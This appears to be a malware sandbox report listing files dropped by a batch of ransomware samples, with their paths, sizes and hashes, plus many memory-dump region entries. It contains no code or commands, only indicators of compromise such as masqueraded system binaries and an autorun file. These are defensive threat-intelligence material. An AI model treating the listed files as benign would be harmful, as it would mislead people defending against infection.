29ea867940d3f62556d960f30433a8336938c733d22213486811b2afc2b317e66a7ff99821465387eda6f8be65a9527290ad56ceaa386b91bb0bc3e6b0152ab5

Download Submit
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe

Filesize
142KB

MD5
f7aded1fe838c4575a9c79edd4c17c6d

SHA1
4d4c757852cbd46c493841c6630a2615042df61d

SHA256
81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8

SHA512
dfe660908130d1e9a212e09e0aa53708467098354b8c0254ccbbeec845609644a39ebde88432e68de16b406a298702c925eff45460123db21942c0ff0007ff26

Download Submit
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe

Filesize
801KB

MD5
b93b922bf25eda90e50e3c594e347665

SHA1
e674e2f56de8fc3d34c7f8f6a41df9a8260fdb19

SHA256
fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70

SHA512
538ec3398185202e30197167a47d021945c29effc2e09b7b84bb57f2880038b81ff338a3f8f82c9b1c21e95577f53ac45b58bc6c71bfe7f318a50fcff9499c92

Download Submit
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe

Filesize
12.3MB

MD5
9d1a6376f0dcb0af0e7907be26008113

SHA1
5b4dd780b3fbe215645330410b6cf0adf9812a04

SHA256
1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b

SHA512
5ee45b8050d1277949f1f65855e2de83822b797d96e5d399815e27b26964be3383c1ea5c8aadf76907f4eb15bb83522bdde4ec1243dc540d72a311b529e27e7e

Download Submit
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe

Filesize
2.2MB

MD5
f7260cf5caa47008c8824982a87964b5

SHA1
00e34564366432c41f7eb66009ac82cd60b97aae

SHA256
1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c

SHA512
fbc8def80a9af0bb5f39064eaa35f132b712194957b6a35cccc9ebbcbdc8ec29f9478ff4735a0d02858ee9bcb8e645a847d35c4acef1bb8e7cd63671bb9f081c

Download Submit
C:\Users\Admin\Desktop\00467\Setup.exe

Filesize
6.4MB

MD5
cd4cfbf49e3c90acd9d257f223c79578

SHA1
976cb6c00897cc882b0ceaa17b94ddaa316aad4f

SHA256
bb84ef51108fb1c85fa9c2488917512aa2de3c1d83d1e3662650053b63ed6cd0

SHA512
8b6fe276b81db9ff9f8871cc778e316f433019d27f2c0adff40ffc189960d49ae9715fd2c93efae7e48ad8ad8cc0e7ef6e51e4683eab9a9fab7521821ec43647

Download Submit
C:\Users\Admin\Desktop\00467\hgfjgbnvbnfyvhjfcghbnftydeghdfhf.vbs

Filesize
263B

MD5
632060503c31350c4211a904409a502f

SHA1
83283aaf16cbfa11f8ad13a780b27055bd6de6a9

SHA256
bc78c6872223639a922cc687de06cae82d888011604f7ab1594367c48ef66a30

SHA512
385818e3181b870e26c2f64a787c32f88b376138d6cb71e8c388e000f4f2bfd8c7b5a2ef518253d9a3d77b8dae961fc4bd4f92af697f411a12b4fb19338a0c33

Download Submit
C:\Users\Admin\Desktop\00467\smss.exe

Filesize
19KB

MD5
e3bd75e05770ebd9abde78d848488c1d

SHA1
66fa05128ff13512ea044abb5a87a771e3a9d751

SHA256
09d8ca1bb525fa6483c213716d1b9a86dd79490dd90d191f8e2906e80e8bda69

SHA512
9019c57746c968cbb9b7824ee8a1e93ea612f6a60ca2d0301124777ddb403eb41dc8fe5f9e52bc59bc50ec9af5c3ab3da119c85101619289e537acfef9a2b0c1

Download Submit
C:\Users\Admin\Desktop\index.html

Filesize
2KB

MD5
cb1a31fedc604d26b8beb12561082617

SHA1
d33c2c05e4532049cc1124a71fbbe59b9bd19696

SHA256
dd84609be3a7f63aab5853d22170129de542ea4810c76760e40791010eab9506

SHA512
7b3559f3e33c18545d56cd892e03062c33e650450d4e39d0ee0bfeaf0f1cfa8037e5e529d47c72924ed3ec12631e885b0b1d0a5d03e943f0ffed15f9809ffc62

Download Submit
C:\Users\Admin\Pictures\README.txt

Filesize
957B

MD5
365c502640bca4b34af55c726037894a

SHA1
4ba1dc559bdcc223ca46dbc94a0c5c9e749a6b79

SHA256
4e79b63103b2341d4666279bc3012983f369a687527cf3fa5ffac7c9b3d665f5

SHA512
78b2f483432a2b1a31f49f4cfcddf4d23ae5d4cb4c1821b5d636b76770337e9a80075fb0d2274e721ef46570ad461c597b1b7ebca52b0ed3a4456dfbafc6941b

Download Submit
C:\Windows\SysWOW64\HelpMe.exe

Filesize
2.4MB

MD5
81d2e40b9439addc10146f3a6f001fe2

SHA1
58be1c13baab725c752ef723c33f03e2d64ae4cb

SHA256
7c32e79fe312e6e108f6be3312510888bc7a8a44722e842ee4eea679eedb6ed9

SHA512
02724c366df565bd2b2cf85ca4bf61fcc7b171494c8b0ad4d20740adda8b850e4baae5510e2a919e40ffb2ff2eae9f902ec9b7afff3f4cf85e3eddb80a6271a0

Download Submit
C:\XK\Folder.htt

Filesize
640B

MD5
5d142e7978321fde49abd9a068b64d97

SHA1
70020fcf7f3d6dafb6c8cd7a55395196a487bef4

SHA256
fe222b08327bbfb35cbd627c0526ba7b5755b02ce0a95823a4c0bf58e601d061

SHA512
2351284652a9a1b35006baf4727a85199406e464ac33cb4701a6182e1076aaff022c227dbe4ad6e916eba15ebad08b10719a8e86d5a0f89844a163a7d4a7bbf9

Download Submit
C:\desktop.ini

Filesize
217B

MD5
c00d8433fe598abff197e690231531e0

SHA1
4f6b87a4327ff5343e9e87275d505b9f145a7e42

SHA256
52fb776a91b260bf196016ecb195550cdd9084058fe7b4dd3fe2d4fda1b6470e

SHA512
a71523ec2bd711e381a37baabd89517dff6c6530a435f4382b7f4056f98aff5d6014e85ce3b79bd1f02fdd6adc925cd3fc051752c1069e9eb511a465cd9908e1

Download Submit
C:\xk.exe

Filesize
196KB

MD5
bddd446594b299220998cfd47e0ff355

SHA1
b29fd87008980d5fc154ff7c88d25112bccc9286

SHA256
cf1b437b549b1d33704ff504940c50e7943fe7eb70fb927a8b161ea383df5954

SHA512
c89b710712802d8265e8d86521d96d7ef336f3d5d7d72618ea6e555d4da30f6fddadd453045b76c4b4abdd6a243684a92c17973aebaafee280af4498cd8ffd39

Download Submit
F:\AUTORUN.INF

Filesize
145B

MD5
ca13857b2fd3895a39f09d9dde3cca97

SHA1
8b78c5b2ec97c372ebdcef92d14b0998f8dd6dd0

SHA256
cfe448b4506a95b33b529efa88f1ac704d8bdf98a941c065650ead27609318ae

SHA512
55e5b5325968d1e5314527fb2d26012f5aae4a1c38e305417be273400cb1c6d0c22b85bddb501d7a5720a3f53bb5caf6ada8a7894232344c4f6c6ef85d226b47

Download Submit
memory/456-2721-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1196-111-0x000002469DA40000-0x000002469DAB6000-memory.dmp

Filesize
472KB

Download
memory/1196-110-0x000002469D9F0000-0x000002469DA34000-memory.dmp

Filesize
272KB

Download
memory/1196-105-0x000002469CC10000-0x000002469CC32000-memory.dmp

Filesize
136KB

Download
memory/2256-163-0x0000000005600000-0x000000000569C000-memory.dmp

Filesize
624KB

Download
memory/2256-161-0x0000000005990000-0x0000000005F34000-memory.dmp

Filesize
5.6MB

Download
memory/2256-158-0x00000000009E0000-0x0000000000C1C000-memory.dmp

Filesize
2.2MB

Download
memory/2256-162-0x00000000054C0000-0x0000000005552000-memory.dmp

Filesize
584KB

Download
memory/2344-1471-0x000000000B5E0000-0x000000000BD86000-memory.dmp

Filesize
7.6MB

Download
memory/2344-235-0x00000000049C0000-0x00000000049CA000-memory.dmp

Filesize
40KB

Download
memory/2344-181-0x0000000000030000-0x000000000005A000-memory.dmp

Filesize
168KB

Download
memory/2456-114-0x000002C3E6A30000-0x000002C3E6A31000-memory.dmp

Filesize
4KB

Download
memory/2456-121-0x000002C3E6A30000-0x000002C3E6A31000-memory.dmp

Filesize
4KB

Download
memory/2456-124-0x000002C3E6A30000-0x000002C3E6A31000-memory.dmp

Filesize
4KB

Download
memory/2456-118-0x000002C3E6A30000-0x000002C3E6A31000-memory.dmp

Filesize
4KB

Download
memory/2456-123-0x000002C3E6A30000-0x000002C3E6A31000-memory.dmp

Filesize
4KB

Download
memory/2456-119-0x000002C3E6A30000-0x000002C3E6A31000-memory.dmp

Filesize
4KB

Download
memory/2456-113-0x000002C3E6A30000-0x000002C3E6A31000-memory.dmp

Filesize
4KB

Download
memory/2456-112-0x000002C3E6A30000-0x000002C3E6A31000-memory.dmp

Filesize
4KB

Download
memory/2456-120-0x000002C3E6A30000-0x000002C3E6A31000-memory.dmp

Filesize
4KB

Download
memory/2456-122-0x000002C3E6A30000-0x000002C3E6A31000-memory.dmp

Filesize
4KB

Download
memory/3044-168-0x0000000000C90000-0x0000000000E90000-memory.dmp

Filesize
2.0MB

Download
memory/3464-340-0x00000000050E0000-0x00000000050FE000-memory.dmp

Filesize
120KB

Download
memory/3464-1484-0x0000000006140000-0x000000000616C000-memory.dmp

Filesize
176KB

Download
memory/3464-3865-0x0000000006560000-0x000000000656C000-memory.dmp

Filesize
48KB

Download
memory/3464-3885-0x000000000E230000-0x0000000012506000-memory.dmp

Filesize
66.8MB

Download
memory/3464-3869-0x0000000007140000-0x00000000071C2000-memory.dmp

Filesize
520KB

Download
memory/3464-1519-0x00000000086F0000-0x000000000879A000-memory.dmp

Filesize
680KB

Download
memory/3464-283-0x0000000004C50000-0x0000000004CC6000-memory.dmp

Filesize
472KB

Download
memory/3464-3880-0x0000000009970000-0x0000000009F46000-memory.dmp

Filesize
5.8MB

Download
memory/3464-189-0x00000000001D0000-0x000000000029E000-memory.dmp

Filesize
824KB

Download
memory/3836-155-0x0000017C5D2A0000-0x0000017C5D2C2000-memory.dmp

Filesize
136KB

Download
memory/3896-159-0x0000000000120000-0x0000000000132000-memory.dmp

Filesize
72KB

Download
memory/3916-1527-0x0000000006960000-0x0000000006982000-memory.dmp

Filesize
136KB

Download
memory/3916-1526-0x00000000069A0000-0x0000000006A06000-memory.dmp

Filesize
408KB

Download
memory/3916-1353-0x00000000068D0000-0x00000000068F8000-memory.dmp

Filesize
160KB

Download
memory/3916-160-0x0000000000550000-0x000000000075C000-memory.dmp

Filesize
2.0MB

Download
memory/3972-1626-0x00000000002F0000-0x0000000000324000-memory.dmp

Filesize
208KB

Download
memory/4164-1174-0x0000000000E20000-0x0000000000E2C000-memory.dmp

Filesize
48KB

Download
memory/4792-1658-0x0000000000400000-0x0000000000442000-memory.dmp

Filesize
264KB

Download
memory/4792-885-0x0000000000400000-0x0000000000442000-memory.dmp

Filesize
264KB

Download
memory/5016-882-0x00000000005A0000-0x00000000007DA000-memory.dmp

Filesize
2.2MB

Download
memory/5016-1645-0x00000000005A0000-0x00000000007DA000-memory.dmp

Filesize
2.2MB

Download
memory/5324-1475-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5324-1334-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5836-1668-0x0000000003390000-0x0000000003407000-memory.dmp

Filesize
476KB

Download
memory/5836-1399-0x0000000003520000-0x000000000352F000-memory.dmp

Filesize
60KB

Download
memory/5836-1667-0x0000000000400000-0x000000000058E000-memory.dmp

Filesize
1.6MB

Download
memory/5836-1275-0x0000000003390000-0x0000000003407000-memory.dmp

Filesize
476KB

Download
memory/5836-1669-0x0000000003520000-0x000000000352F000-memory.dmp

Filesize
60KB

Download
memory/5836-2959-0x0000000000400000-0x000000000058E000-memory.dmp

Filesize
1.6MB

Download
memory/5864-1725-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5864-1473-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5872-1646-0x0000000002F30000-0x0000000002F50000-memory.dmp

Filesize
128KB

Download
memory/5872-1631-0x0000000000FB0000-0x0000000000FD8000-memory.dmp

Filesize
160KB

Download
memory/6048-1643-0x00000000020A0000-0x00000000020B7000-memory.dmp

Filesize
92KB

Download
memory/6048-1642-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/6048-1623-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/6124-1748-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/6328-1539-0x0000000000400000-0x00000000005BB000-memory.dmp

Filesize
1.7MB

Download
memory/6328-2804-0x0000000000400000-0x00000000005BB000-memory.dmp

Filesize
1.7MB

Download
memory/6328-3580-0x0000000000400000-0x00000000005BB000-memory.dmp

Filesize
1.7MB

Download
memory/6392-1636-0x0000020A64000000-0x0000020A6404E000-memory.dmp

Filesize
312KB

Download
memory/6708-1670-0x0000000001300000-0x0000000001312000-memory.dmp

Filesize
72KB

Download
memory/6708-3318-0x0000000000D50000-0x0000000000D58000-memory.dmp

Filesize
32KB

Download
memory/6792-1756-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/6840-1755-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/6848-2722-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/6916-2651-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/7064-3191-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/7116-1635-0x0000000000560000-0x000000000057B000-memory.dmp

Filesize
108KB

Download
memory/7116-1750-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download
memory/7116-1751-0x0000000001FA0000-0x0000000001FB7000-memory.dmp

Filesize
92KB

Download
memory/7184-3371-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/7240-3282-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/7240-2859-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/7416-2846-0x0000000000780000-0x00000000007D4000-memory.dmp

Filesize
336KB

Download
memory/7668-3441-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/7684-1664-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/7684-1663-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/7860-1677-0x00000000009A0000-0x00000000009F6000-memory.dmp

Filesize
344KB

Download
memory/7860-1680-0x0000000005280000-0x00000000052D6000-memory.dmp

Filesize
344KB

Download
memory/7860-1681-0x00000000052F0000-0x00000000052FA000-memory.dmp

Filesize
40KB

Download
memory/8320-3449-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/8348-3005-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/8524-3396-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/9396-3133-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/9396-3134-0x0000000002210000-0x0000000002227000-memory.dmp

Filesize
92KB

Download
memory/10848-3283-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/10848-3301-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/11032-3778-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/11032-3619-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/11044-3655-0x0000000009940000-0x0000000009946000-memory.dmp

Filesize
24KB

Download
memory/11044-3654-0x0000000006BB0000-0x0000000006BC4000-memory.dmp

Filesize
80KB

Download
memory/11500-3361-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/11500-3353-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/11516-3720-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/11696-3378-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/11976-3422-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/11984-3779-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download